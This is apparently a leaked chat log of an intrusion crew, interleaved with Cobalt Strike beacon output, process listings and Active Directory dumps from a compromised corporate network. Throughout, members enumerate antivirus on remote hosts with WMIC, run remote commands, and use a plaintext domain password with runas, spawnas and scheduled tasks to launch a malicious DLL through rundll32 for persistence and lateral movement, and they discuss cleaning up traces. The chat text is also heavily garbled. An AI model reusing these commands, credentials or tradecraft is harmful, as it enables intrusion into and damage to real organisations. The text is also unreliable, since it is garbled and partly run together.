270 SMSvcHost.exe 8 2712 7 22892544

181 SAVAdminService.exe 8 2720 6 4710400

122 svchost.exe 8 2772 2 10158080

177 swc_service.exe 8 2792 6 8200192

352 ManagementAgentNT.exe 8 2804 21 8261632

523 SSPService.exe 8 2868 83 26312704

184 ALsvc.exe 8 2876 8 3194880

185 tvnserver.exe 8 2900 12 7376896

138 swi_filter.exe 8 2920 3 6029312

507 MsMpEng.exe 8 2960 25 179359744

139 svchost.exe 8 3004 8 10702848

218 svchost.exe 8 3012 16 12181504

119 armsvc.exe 8 3040 2 6270976

264 swi_service.exe 8 3048 16 22609920

184 swi_fc.exe 8 3200 6 16805888

202 SMSvcHost.exe 8 3720 5 14598144

194 msdtc.exe 8 4016 9 9834496

347 RouterNT.exe 8 4980 20 8503296

617 SearchIndexer.exe 8 1304 11 16453632

313 WmiPrvSE.exe 8 5016 11 31014912

279 WmiPrvSE.exe 8 4536 11 20398080

180 WmiPrvSE.exe 8 5484 8 10162176

195 WmiPrvSE.exe 8 5764 6 9646080
``will be our local meme)Forgot, now fix itfirst you only need to make a token to run the tripod only remove the hell infopreparation which you did on the serverskai? waiting for the report then and in such cases under the group name in () write a description, what kind of software do group `HCL Sametime` and there this server ``.
HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration
``https://www.processchecker.com/developers_info/25/IBM%20Corpче what's that gadget, can't Google it.
StLaunch.exe 5324 Services 0 4,820 K NT AUTHORITY\SYSTEM 0:00:00
stmsservice.exe 5348 Services 0 18,428 K NT AUTHORITY\SYSTEM 0:00:00
nSTMeetingServer.exe 5376 Services 0 20,548 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 5392 Services 0 3,580 K NT AUTHORITY\SYSTEM 0:00:00
steventserver.exe 5416 Services 0 38,924 K NT AUTHORITY\SYSTEM 0:02:35
stservicemanager.exe 5564 Services 0 33,128 K NT AUTHORITY\SYSTEM 0:01:30
RouterNT.exe 6000 Services 0 8,144 K NT AUTHORITY\SYSTEM 0:00:00
StCommLaunch.exe 3688 Services 0 5,940 K NT AUTHORITY\SYSTEM 0:00:00
STCommunity.exe 6072 Services 0 10,344 K NT AUTHORITY\SYSTEM 0:00:47
STConfigurationApp.exe 524 Services 0 84,984 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 5020 Services 0 3,628 K NT AUTHORITY\SYSTEM 0:00:00
StLogger.exe 940 Services 0 220,100 K NT AUTHORITY\SYSTEM 0:00:03
STPlaces.exe 5532 Services 0 7,764 K NT AUTHORITY\SYSTEM 0:00:00
STOnlineDir.exe 5576 Services 0 7,948 K NT AUTHORITY\SYSTEM 0:00:00
stpresencecompatmgr.exe 3356 Services 0 28,844 K NT AUTHORITY\SYSTEM 0:00:02
stpresencemgr.exe 2836 Services 0 35,068 K NT AUTHORITY\SYSTEM 0:01:44
stpresencesubmgr.exe 2272 Services 0 79,188 K NT AUTHORITY\SYSTEM 0:01:33
stuserinfo.exe 3424 Services 0 77,720 K NT AUTHORITY\SYSTEM 0:00:04
STConference.exe 4708 Services 0 7,548 K NT AUTHORITY\SYSTEM 0:00:00
STDirectory.exe 5680 Services 0 50,696 K NT AUTHORITY\SYSTEM 0:00:01
conhost.exe 5996 Services 0 3,620 K NT AUTHORITY\SYSTEM 0:00:00
StChatLogging.exe 5824 Services 0 7,616 K NT AUTHORITY\SYSTEM 0:00:00
StResolve.exe 5728 Services 0 62,780 K NT AUTHORITY\SYSTEM 0:00:15
conhost.exe 5684 Services 0 3,628 K NT AUTHORITY\SYSTEM 0:00:00
StUserStorage.exe 6184 Services 0 471,648 K NT AUTHORITY\SYSTEM 0:00:11
StPrivacy.exe 6248 Services 0 88,028 K NT AUTHORITY\SYSTEM 0:00:00
STMux.exe 6312 Services 0 26,828 K NT AUTHORITY\SYSTEM 0:00:59
StAdminSrv.exe 6360 Services 0 7,468 K NT AUTHORITY\SYSTEM 0:00:00
STSecurity.exe 6400 Services 0 7,436 K NT AUTHORITY\SYSTEM 0:00:00
stpolicy.exe 6440 Services 0 45,056 K NT AUTHORITY\SYSTEM 0:00:04
STFileTransfer.exe 6532 Services 0 7,604 K NT AUTHORITY\SYSTEM 0:00:02
STPolling.exe 6584 Services 0 7,392 K NT AUTHORITY\SYSTEM 0:00:00
StUsers.exe 6660 Services 0 57,984 K
khm khm (@user9) I thought someone was going to say take the hell off of the system, I'm just kidding, is everybody that incomprehensible? then why do we all go home if there is no clues, just make a VMs group
System Manufacturer: VMware, Inc.
System Model: VMware7,1
``and take off sisteminfo``.
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 24 K NT AUTHORITY\SYSTEM 109:24:47
System 4 Services 0 304 K N/A 0:02:32
smss.exe 332 Services 0 1,284 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 420 Services 0 4,996 K NT AUTHORITY\SYSTEM 0:00:55
wininit.exe 472 Services 0 5,268 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 480 Console 1 10,532 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 516 Console 1 4,864 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 572 Services 0 13,168 K NT AUTHORITY\SYSTEM 0:00:10
lsass.exe 588 Services 0 17,344 K NT AUTHORITY\SYSTEM 0:02:05
lsm.exe 596 Services 0 7,252 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 696 Services 0 11,408 K NT AUTHORITY\SYSTEM 0:00:11
SEDService.exe 752 Services 0 13,820 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 844 Services 0 10,016 K NT AUTHORITY\NETWORK SERVICE 0:00:05
LogonUI.exe 916 Console 1 19,572 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 932 Services 0 16,168 K NT AUTHORITY\LOCAL SERVICE 0:00:15
svchost.exe 1016 Services 0 45,260 K NT AUTHORITY\SYSTEM 0:02:12
svchost.exe 428 Services 0 13,484 K NT AUTHORITY\LOCAL SERVICE 0:00:02
svchost.exe 468 Services 0 16,956 K NT AUTHORITY\SYSTEM 0:00:16
SavService.exe 688 Services 0 292,136 K NT AUTHORITY\LOCAL SERVICE 0:13:21
svchost.exe 1304 Services 0 19,736 K NT AUTHORITY\NETWORK SERVICE 0:00:08
svchost.exe 1416 Services 0 11,980 K NT AUTHORITY\LOCAL SERVICE 0:00:00
spoolsv.exe 1560 Services 0 16,348 K NT AUTHORITY\SYSTEM 0:00:03
svchost.exe 1632 Services 0 11,624 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1808 Services 0 2,996 K NT AUTHORITY\LOCAL SERVICE 0:00:00
SAVAdminService.exe 1848 Services 0 3,084 K NT AUTHORITY\SYSTEM 0:00:00
nra.exe 1908 Services 0 12,480 K NT AUTHORITY\SYSTEM 0:00:00
nrcuser.exe 1328 Services 0 114,912 K NT AUTHORITY\SYSTEM 0:00:00
ManagementAgentNT.exe 1504 Services 0 6,924 K NT AUTHORITY\SYSTEM 0:00:39
ALsvc.exe 2228 Services 0 2,168 K NT AUTHORITY\SYSTEM 0:00:08
SSPService.exe 2364 Services 0 21,696 K NT AUTHORITY\SYSTEM 0:00:01
swc_service.exe 2420 Services 0 6,280 K NT AUTHORITY\SYSTEM 0:00:00
swi_service.exe 2536 Services 0 24,112 K NT AUTHORITY\SYSTEM 0:00:00
tvnserver.exe 2596 Services 0 7,004 K NT AUTHORITY\SYSTEM 0:00:00
VGAuthService.exe 2692 Services 0 11,156 K NT AUTHORITY\SYSTEM 0:00:00
vmtoolsd.exe 2760 Services 0 22,260 K NT AUTHORITY\SYSTEM 0:02:31
ManagementAgentHost.exe 2812 Services 0 10,320 K NT AUTHORITY\SYSTEM 0:00:00
WinCollectSvc.exe 2176 Services 0 11,540 K NT AUTHORITY\SYSTEM 0:01:49
WinCollect.exe 3096 Services 0 20,928 K NT AUTHORITY\SYSTEM 0:44:21
conhost.exe 3108 Services 0 3,524 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 3212 Services 0 20,300 K NT AUTHORITY\NETWORK SERVICE 0:01:49
svchost.exe 3696 Services 0 10,296 K NT AUTHORITY\NETWORK SERVICE 0:00:01
svchost.exe 3756 Services 0 6,744 K NT AUTHORITY\NETWORK SERVICE 0:00:00
dllhost.exe 3892 Services 0 12,556 K NT AUTHORITY\SYSTEM 0:00:00
msdtc.exe 4044 Services 0 8,564 K NT AUTHORITY\NETWORK SERVICE 0:00:00
RouterNT.exe 5040 Services 0 8,072 K NT AUTHORITY\SYSTEM 0:00:00
ANServer.exe 2188 Services 0 13,412 K LOOMIS\gentranadm 0:00:20
Mercury.exe 1320 Services 0 11,960 K LOOMIS\gentranadm 0:00:01
WmiPrvSE.exe 2260 Services 0 21,468 K NT AUTHORITY\SYSTEM 0:00:03
RpcSrv.exe 4868 Services 0 12,004 K LOOMIS\gentranadm 0:00:03
TrustedInstaller.exe 4840 Services 0 737,992 K NT AUTHORITY\SYSTEM 0:01:57

``a list of processes in the studiovirtualka what else? if TightVNC process hangs in the RDS can you throw the server? I would generally recommend that you start learning ps or batsyrazvedeniya with batnik, stupid in syntax) still useful this script of course ping that did not have to then end of the day did all wellmodtsida no I thought that you did supernatural)aaa[ ](https://mediaeveryonecom/group/archive-loomisco-com?msg=FmF4byGeqBMLNNFaB) so I just got into the process))) aah, that's not it.@user9 throw pliz example commands, write yourself in the notes on spawning sessions from another context through jump with crudes yeah?
 beacon from Shutdown@192.168.0.249 (SCANSTORAGE)
``Then clean up, delete files, tsk, processes and in slipda and that's it for today the list of servers to finish everything, great after all docudocumentation please share with colleagues and add if something is missing who documented the current information for today?
    IMAGING2-NEW.loomisco.com
Block GPO:
    Metafile-vm1.loomisco.com

these? + a fully sorted list of servers and the result is shuffleable I think you understand that the frontend is just the interface for interoperability
Sophos.FrontEnd.Service.e 4816 Services 0 99,720 K LOOMIS\lynx 0:00:06
``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=CrSPtfnFspCxPtC6v) list[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=jHTWaeKQKgJGK7qHM) 1
 [ManagementAgentNT.exe]
  TCP 10.10.10.56:54963 192.168.0.109:8194
``As you understood, remove the netstat and see where it sends the data``.
ManagementAgentNT.exe file information

The process known as Sophos Agent belongs to Sophos Messaging System or Sophos Remote Management System software
``To remove doubts on a bare-metal server, non-standard processes will be ABs``.
ManagementAgentNT.exe 1992 Services 0 6,616 K NT AUTHORITY\SYSTEM 0:02:41
swc_service.exe 1340 Services 0 5,212 K NT AUTHORITY\SYSTEM 0:00:00
SavService.exe 9812 Services 0 360,792 K NT AUTHORITY\LOCAL SERVICE 1:03:33
SAVAdminService.exe 7228 Services 0 5,704 K NT AUTHORITY\SYSTEM 0:00:00
swi_service.exe 4432 Services 0 23,152 K NT AUTHORITY\SYSTEM 0:00:01
``So it's simple - we saw in the processes AB (sofos) in networks it is centralized in its adminstrate search AB in the network)`` While the scan goes160 of 543 works shufflefinder, enough sofos everywherepft,fkcz ping them there live 1/10``
beacon> shell WMIC /Node:192.168.4.28 /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:192.168.4.28 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 139 bytes
[+] received output:




displayName=Sophos Anti-Virus


``Chrome is open under Give a list of processes from here: `192.168.0.109` what exactly?
beacon> shell WMIC /Node:192.168.1.235 /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:192.168.1.235 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 140 bytes
[+] received output:




displayName=Sophos Anti-Virus





``@user8 do not delete files means?
The taskeng.exe process is part of the Task Scheduler Engine of Microsoft
Isn't the box that pops up at startup of the Delloks called taskeng.exe? )))) great, make a shuffinder and the process from YES[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=pMwiwkBPrSzjwLxZ7) will hang there) then the following method: make a batch with timeout 9999999 and run us stasx apparently when you run it, dlk is not working and cmd is running under YES[ ](https://mediaeveryonecom/group/archive-loomisco-com?msg=T8ffZsEkytLgk4NjD) by inertia did the process hang[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=dzCgGB82tkcZDXArb) why is it here? PS look sheet[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=izJa5MLu3dXbY2Sjd) ``
shell wmic /node:10.10.10.56 process call create "cmd /c netstat.exe -abno > C:\Windows\Temp\output.txt"

```
Take ```.
beacon> runas /user:loomisco.com\Shutdown p3bk@c1 "cmd /c rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint"
[*] Tasked beacon to execute: "cmd /c rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" as /user:loomisco.com\Shutdown
[+] host called home, sent: 125 bytes
[-] could not run "cmd /c rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" as /user:loomisco.com\Shutdown: 5
```
what did i do wrong ?
beacon> shell WMIC /Node:192.168.6.34 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:192.168.6.34 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 139 bytes
[+] received output:
ERROR:

Description = The RPC server is unavailable.


``and all then@user8 in notes syntax[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=yYkABwJhkA8ELWjGJ) second[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=FX8LTXvLS4Yv2jQf7) which bicon[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=pkcJTCAtBsPiBCb5P) there may be another AB on top)yes it worked out and file not giveghere netstat yet?[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=MKeNbEDTM3fFiTCMF) which is obvious and 2 more pk for accuracy ``
beacon> shell WMIC /Node:192.168.0.107 /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:192.168.0.107 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 140 bytes
[+] received output:




displayName=Sophos Anti-Virus


Waiting)) everything will be here [ ] (https://mediaeveryone.com/group/archive-loomisco-com?msg=4yRLZ27gz2fcHZEjG) 1Da sure I asked for user PCs for a reason [ ] (https://mediaeveryone.com/group/archive-loomisco-com?msg=DXTtNivyhKiYG3R2G) The above link does not work on server OSes, because such namespace does not exist as such `C:\Windows\temp\vmware-temp\AgentNT.dll` - again, did not pay attention, that's the same metafile` `` I am confused.
Node:10.10.10.56
```
what os? now i will try by the way ranas did not work? with the creed can try through vmik if you just start the dll then the session appears and without stask? as i have not tried, through the stask can not start the dll ``
beacon> shell WMIC /Node:10.10.10.56 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:10.10.10.56 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 138 bytes
[+] received output:
ERROR:

Description = Invalid namespace


``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=s2h9mkJEncYNNDKjM) just change the node[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=Td6keCTc5tChNk3tn) and in which beacon? Yes, some ancient manuscript ``WMIC /Node:localhost /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List `` I think something in Latin[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=ReWK9JmyeG4GA7KZL) give you a nickname if you understand it here take another list of AVs on user PCs, 2-3 pcs, kznm ``
beacon> shell wmic /node:Metafile-vm1.loomisco.com process call create "netstat.exe -abno > C:\Windows\Temp\output.txt"
[*] Tasked beacon to run: wmic /node:Metafile-vm1.loomisco.com process call create "netstat.exe -abno > C:\Windows\Temp\output.txt"
[+] host called home, sent: 136 bytes
[+] received output:
Invalid Global Switch.


beacon> shell wmic /node:10.10.10.56 process call create "netstat.exe -abno > C:\Windows\Temp\output.txt"
[*] Tasked beacon to run: wmic /node:10.10.10.56 process call create "netstat.exe -abno > C:\Windows\Temp\output.txt"
[+] host called home, sent: 122 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 8144;
	ReturnValue = 0;
};

``and C:\windows\temp alwaysC:\temp is not alwaysC:\tempC:\, C:\users are quite visible places it is clear, I for example do not recommend to put files in such places, since the systems rights anyway - C:\windows\tempwmic /node:Metafile-vm1.loomisco.com process call create "netstat.exe -abno > C:\output.txt"@user8 then let's see the list of installed software
Metafile-vm1.loomisco.com
``Maybe it's this @user7 add /RP just in case /RP is not a filewasher at all```
beacon> shell rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint
[*] Tasked beacon to run: rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint
```
Does it work that way?
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 24 K NT AUTHORITY\SYSTEM 1767:21:11
System 4 Services 0 6,104 K N/A 0:02:10
smss.exe 424 Services 0 740 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 492 Services 0 5,728 K NT AUTHORITY\SYSTEM 0:00:21
csrss.exe 536 Console 1 10,136 K NT AUTHORITY\SYSTEM 0:00:00
wininit.exe 544 Services 0 4,264 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 592 Console 1 5,228 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 624 Services 0 8,488 K NT AUTHORITY\SYSTEM 0:00:09
lsass.exe 636 Services 0 17,392 K NT AUTHORITY\SYSTEM 0:06:14
lsm.exe 644 Services 0 5,700 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 804 Services 0 7,880 K NT AUTHORITY\SYSTEM 0:02:06
svchost.exe 864 Services 0 7,976 K NT AUTHORITY\NETWORK SERVICE 0:00:59
svchost.exe 960 Services 0 12,636 K NT AUTHORITY\LOCAL SERVICE 0:02:09
svchost.exe 1032 Services 0 9,528 K NT AUTHORITY\SYSTEM 0:00:02
svchost.exe 1044 Services 0 60,424 K NT AUTHORITY\SYSTEM 0:27:09
SLsvc.exe 1056 Services 0 9,808 K NT AUTHORITY\NETWORK SERVICE 0:00:00
svchost.exe 1124 Services 0 11,412 K NT AUTHORITY\LOCAL SERVICE 0:00:12
svchost.exe 1184 Services 0 11,008 K NT AUTHORITY\SYSTEM 0:00:11
svchost.exe 1484 Services 0 17,628 K NT AUTHORITY\NETWORK SERVICE 0:00:03
svchost.exe 1608 Services 0 9,828 K NT AUTHORITY\LOCAL SERVICE 0:00:00
spoolsv.exe 1816 Services 0 9,508 K NT AUTHORITY\SYSTEM 0:00:01
armsvc.exe 1844 Services 0 3,660 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1860 Services 0 9,528 K NT AUTHORITY\SYSTEM 0:00:00
inetinfo.exe 1944 Services 0 13,524 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2024 Services 0 5,796 K NT AUTHORITY\NETWORK SERVICE 0:00:00
svchost.exe 224 Services 0 3,092 K NT AUTHORITY\LOCAL SERVICE 0:00:00
tvnserver.exe 2088 Services 0 8,256 K NT AUTHORITY\SYSTEM 0:00:01
VGAuthService.exe 2152 Services 0 10,356 K NT AUTHORITY\SYSTEM 0:00:00
vmtoolsd.exe 2168 Services 0 43,536 K NT AUTHORITY\SYSTEM 0:33:04
svchost.exe 2184 Services 0 8,788 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2196 Services 0 2,236 K NT AUTHORITY\SYSTEM 0:00:00
WinCollectSvc.exe 2280 Services 0 9,876 K NT AUTHORITY\SYSTEM 0:48:11
taskeng.exe 2420 Services 0 8,132 K NT AUTHORITY\SYSTEM 0:00:01
WinCollect.exe 2540 Services 0 20,824 K NT AUTHORITY\SYSTEM 16:06:55
WmiPrvSE.exe 2876 Services 0 18,764 K NT AUTHORITY\NETWORK SERVICE 0:34:28
dllhost.exe 2960 Services 0 12,896 K NT AUTHORITY\SYSTEM 0:00:00
msdtc.exe 3208 Services 0 7,416 K NT AUTHORITY\NETWORK SERVICE 0:00:00
svchost.exe 3520 Services 0 5,200 K NT AUTHORITY\NETWORK SERVICE 0:00:00
WmiPrvSE.exe 3624 Services 0 30,580 K NT AUTHORITY\SYSTEM 0:00:08
taskeng.exe 4008 Console 1 7,976 K LOOMIS\Administrator 0:00:00
dwm.exe 528 Console 1 4,492 K LOOMIS\Administrator 0:00:00
explorer.exe 1644 Console 1 26,724 K LOOMIS\Administrator 0:00:07
vmtoolsd.exe 3312 Console 1 9,608 K LOOMIS\Administrator 0:58:09
tvnserver.exe 3228 Console 1 3,924 K LOOMIS\Administrator 0:00:00
RouterNT.exe 784 Services 0 7,724 K NT AUTHORITY\SYSTEM 0:00:02
TrustedInstaller.exe 5556 Services 0 18,668 K NT AUTHORITY\SYSTEM 0:00:38
ManagementAgentNT.exe 1992 Services 0 6,616 K NT AUTHORITY\SYSTEM 0:02:41
swc_service.exe 1340 Services 0 5,212 K NT AUTHORITY\SYSTEM 0:00:00
SavService.exe 9812 Services 0 360,792 K NT AUTHORITY\LOCAL SERVICE 1:03:33
SAVAdminService.exe 7228 Services 0 5,704 K NT AUTHORITY\SYSTEM 0:00:00
swi_service.exe 4432 Services 0 23,152 K NT AUTHORITY\SYSTEM 0:00:01
ALsvc.exe 8796 Services 0 1,612 K NT AUTHORITY\SYSTEM 0:00:42
ALMon.exe 8220 Console 1 1,084 K LOOMIS\Administrator 0:00:17
mmc.exe 5264 Console 1 59,100 K LOOMIS\Administrator 0:00:01
LogonUI.exe 4536 Console 1 11,712 K NT AUTHORITY\SYSTEM 0:00:00
logon.scr 8492 Console 1 2,012 K LOOMIS\Administrator 0:00:00

``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=C3TcGDDgMrj49fiyP) on Metafile-vm1.loomisco.com mostly Sophos (av) processes which beacon?.and if you run it manually will it work ([ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=jQku7Y4vPJaTCwZj2) what is installed may not be active, as a relic of some time with or without cmd, have tried[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=dTcLHjLTMgPAzLKoi) maybe better to look at the installed software and not the processes? try to remove it, so it was removed and the exe is still there?) try to add cmd /c rundll32 ...try adding to the beginning of cmd /c4 people can not find a possible error in the command? 4who works next to @user7 ?yes token@user9 under what conditions would this syntax be? shell tasklist /s /vdatasklist through shell go? and also, get in the habit of immediately deleting the stack behind you it will show and user from which to spin with the flag /v better to check through taclismic?i can not see that the 4th point is done)[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=5ZBsdwsARrCBECn4d) :^)[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=DFqkE6RE5Be5i9EXb) please forward the message where i wrote how to determine)either the error in the /tr itself, or yes, i have prohibited to run the dll
>dNSHostName: Metafile-vm1.loomisco.com

dn:CN=METAFILE-VM1,OU=Block GPOs,OU=Unblocked,OU=Domain Servers,DC=loomisco,DC=com
>servicePrincipalName: TERMSRV/METAFILE-VM1
>servicePrincipalName: TERMSRV/Metafile-vm1.loomisco.com
>servicePrincipalName: HOST/METAFILE-VM1
>servicePrincipalName: HOST/Metafile-vm1.loomisco.com
```
no description, you can't tell from the name, spn 4 things, well where is it not running ?
beacon> shell schtasks /create /ru loomisco.com\Omiller /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc ONCE /sd 10/04/2021 /ST 01:00 /f
[*] Tasked beacon to run: schtasks /create /en loomisco.com\Omiller /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc ONCE /sd 10/04/2021 /ST 01:00 /f
[+] host called home, sent: 199 bytes
[+] received output:
SUCCESS: The scheduled task "ManagementAgentNTT" has successfully been created.

beacon> shell schtasks /run /tn ManagementAgentNTT
[*] Tasked beacon to run: schtasks /run /tn ManagementAgentNTT
[+] host called home, sent: 67 bytes
[+] received output:
SUCCESS: Attempted to run the scheduled task "ManagementAgentNTT".

I wrote above) and how do I understand this pile of spn without a descriptiontype OU=Epic Server but there are some local tricks they have I understand the essence of looking at the names and do not understand what is there) the essence of sorting is to make it clear what the server has, or what it is for?
Data Transfer:
    IMAGING2-NEW.loomisco.com
What do we have here?
Block GPO:
    Metafile-vm1.loomisco.com
``okay1 minutesharfein can't run? ok, what do we have in the end?then we still need to finish sortingOthere I just do not know where to put, they have in hell so says other help @user7 then, because he again randomly pokes commandsa I noticed) on the comadu try)okay, @user9 a little joke more scolding do not want to delete the old task name the same name)`WARNING: The task name "ManagementAgentNTT" already exists. Do you want to replace it (Y/N)? `
how do i get around it ?how do i do that ? i wanted to write shell, but i got make_tokenmisklick
user 2-2 beacon> make_token
[-] make_token error: not enough arguments
[+] host called home, sent: 12 bytes
``just schtasks /ru "domain\user" /tn ....a since the context of the system you do not need to know his password and the user from which startsrun as cser parameter ``RU`@user9 made me laugh now let's take this move and put it on staskladno, I like your way of thinking))))))):weary:just in any unclear situation shoot ad@user9 to tears straight))))By local startup?danet)ah well shuffle_wasn't this task at all unexpectedly written))but it was funny why shoot@user9?[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=Efj2zQJyESPcjTHtW) is already interesting to inject into the process datoken to run staks[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=f4hzmzfvnLpe6h6Cz) as an option, but in the context of user7 conditions?[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=WKubqGyRhwrrAA97a) you can not token, full-fledged process kredami datoken Run remote1) anyone know how to solve the problem user7? I'll ask one question and please honestly[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=uSfseQBEapMAyKgsy) why? you saw it before, conditions are identical, how do you breathe under water? yes I think it is already clear since it does not give) so without /s` it will not create[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=PKw3CSaowHMBxJhxo) set parameters to create local shask what?[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=CLgNf3DtfEyGnWYbq) 1)
2) @user7 already said that he tried 3 users and the error is the same[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=K4J6ek8dFxiMh8yjW) are you trying to create a task on a remote pc? but if yes it does not work please give me a hint how ? if it is possible to spam with the correct creeds need[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=iBbjX4DsGX4eGFQEX) colleagues, everyone has such a verdict?[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=RNnr3nWrzskzwkfqG) did not fully understand the question, got it, then it turns out that not spam YES on this machine? so why are you writing them? credentials are not allowed on the local pktak? - the translation of the error at least he is watched by his team) i already wrote @user3 in lsd now rushed to tasks - they form lists of servers, yes user7 what the hell are you doing, start studying the output of commandsYou have 3 more pktsIs ANY user on the local machine + you write the LOCAL user? someone fucking reads the errors?I'll read it again@user8 wait not much IM Server, Central Server, Database server for multiple DBs with them it's clear RDS/IIS/SQL under 3 users writes that it is not allowed on this tachkse I see descriptions a bunch and almost all idnetic look[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=NGR2KngtpXvLpTGSk) understand what it needs[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=pvmiChf9wyQiRjDvL) silence? strange group do you put them in a separate group?
beacon> shell schtasks /create /s SCANSTORAGE /u loomisco.com\Shutdown /p p3bk@c1 /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc
[*] Tasked beacon to run: schtasks /create /s SCANSTORAGE /u loomisco.com\Shutdown /p p3bk@c1 /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc minute
[+] host called home, sent: 198 bytes
[+] received output:
ERROR: User credentials are not allowed on the local machine.

```
what to do ?try another user ?outside the domain
192.168.0.224:445 (platform: 500 version: 5.0 name: OCR1 domain: WORKGROUP)
``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=KveRMautub3nMqcxD) 1 above file portscan.txk How do you scan the subnets? I think one by description? OK there is user RDS and RDS list by name, by group, by description, by process ``
>dNSHostName: TLCRDSLIC1.loomisco.com
>servicePrincipalName: WSMAN/TLCRDSLIC1
>servicePrincipalName: WSMAN/TLCRDSLIC1.loomisco.com
>servicePrincipalName: TERMSRV/TLCRDSLIC1
>servicePrincipalName: TERMSRV/TLCRDSLIC1.loomisco.com
>servicePrincipalName: RestrictedKrbHost/TLCRDSLIC1
>servicePrincipalName: HOST/TLCRDSLIC1
>servicePrincipalName: RestrictedKrbHost/TLCRDSLIC1.loomisco.com
>servicePrincipalName: HOST/TLCRDSLIC1.loomisco.com
There are lots of SPNs out there. What parameters should I look at to sort them? Anything that is groupedexchange, web, sql, dc, backup, ftp, etc. Try other options to get it in a different context and see what you can do with it:

```
DCs

TLCDC2
TLCDC1
-----
SQL

LOOMISBENSQL01
``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=HW3uXYPkM8t8voqPD) which groups?
beacon> spawnas loomisco.com\Shutdown p3bk@c1 3333
[*] Tasked beacon to spawn windows/beacon_bind_pipe (\.\pipe\msagent_6736) as loomisco.com\Shutdown
[+] host called home, sent: 255580 bytes
[-] could not run C:\Windows\system32\mstsc.exe as loomisco.com\Shutdown: 5
[-] Could not connect to pipe: 2
``Other servers are sorted into groups while some are busy with shuffinder try the smb listener``.
